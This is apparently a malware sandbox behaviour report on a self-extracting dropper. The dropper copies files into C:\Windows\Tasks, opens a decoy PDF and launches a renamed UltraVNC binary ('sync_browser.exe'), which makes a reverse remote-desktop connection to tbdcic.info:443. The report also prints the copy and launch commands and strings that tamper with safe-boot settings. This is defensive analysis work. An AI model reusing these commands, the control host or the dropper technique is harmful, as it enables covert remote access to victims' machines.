Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Downloads\Lom.pdf
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
Source: C:\Windows\Tasks\sync_browser.exe | Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | File created: C:\Users\user~1\AppData\Local\Temp\7ZipSfx.000
Source: Olz7TmvkEW.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
Source: C:\Windows\SysWOW64\timeout.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: sync_browser.exe | String found in binary or memory: -startservice
                          Source: sync_browser.exe | String found in binary or memory: -install
                          Source: sync_browser.exe | String found in binary or memory: -stopservice
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | File read: C:\Users\user\Desktop\Olz7TmvkEW.exe
                          Source: unknown | Process created: C:\Users\user\Desktop\Olz7TmvkEW.exe "C:\Users\user\Desktop\Olz7TmvkEW.exe"
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                          Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: apphelp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: uxtheme.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winsta.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: windows.storage.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wldp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: msls31.dll
                          Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: fwpuclnt.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: rasadhlp.dll
                          Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | File written: C:\Windows\Tasks\UltraVNC.ini
                          Source: C:\Windows\Tasks\sync_browser.exe | File opened: C:\Windows\SYSTEM32\RICHED32.DLL
                          Source: Window Recorder | Window detected: More than 3 window changes detected
                          Source: Olz7TmvkEW.exe | Static file information: File size 1641047 > 1048576
                          Source: Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
                          Source: sdABZ4.E1924R.0.dr | Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: Olz7TmvkEW.exe | Static PE information: real checksum: 0x2af97 should be: 0x198e1b
                          Source: sdABZ4.E1924R.0.dr | Static PE information: section name: .didat
                          Source: sdABZ4.E1924R.2.dr | Static PE information: section name: .didat
                          Source: conhost.exe.6.dr | Static PE information: section name: .didat
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00413660 push eax; ret 0_2_0041368E
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E507FEF1 push rcx; ret 23_2_00007FF7E507FEF2
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50907F8 push rbp; iretd 23_2_00007FF7E50907F9
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50912EF push rbp; iretd 23_2_00007FF7E50912F0
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508DC21 push rsp; ret 23_2_00007FF7E508DC23
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50A8CF9 push 8B481074h; iretd 23_2_00007FF7E50A8CFF
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508DC11 push rax; ret 23_2_00007FF7E508DC13
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5091400 push rbp; iretd 23_2_00007FF7E5091401
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E508DC01 push rcx; ret 23_2_00007FF7E508DC02
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E507FEF1 push rcx; ret 26_2_00007FF7E507FEF2
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50907F8 push rbp; iretd 26_2_00007FF7E50907F9
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50912EF push rbp; iretd 26_2_00007FF7E50912F0
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508DC21 push rsp; ret 26_2_00007FF7E508DC23
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E50A8CF9 push 8B481074h; iretd 26_2_00007FF7E50A8CFF
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508DC11 push rax; ret 26_2_00007FF7E508DC13
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5091400 push rbp; iretd 26_2_00007FF7E5091401
                          Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E508DC01 push rcx; ret 26_2_00007FF7E508DC02

                          Persistence and Installation Behavior

                          Source: C:\Windows\SysWOW64\cmd.exe | Executable created and started: C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\GIjul8.QTIrrr
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr
                          Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\sdABZ4.E1924R
                          Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R
                          Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\Tasks\conhost.exe
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\gTFLK1.jBd3Ei
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\gTFLK1.jBd3EiJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: GIjul8.QTIrrr.2.dr Binary or memory string: bcdedit.exe
                          Source: GIjul8.QTIrrr.2.dr Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: sync_browser.exe.6.dr Binary or memory string: bcdedit.exe
                          Source: sync_browser.exe.6.dr Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot 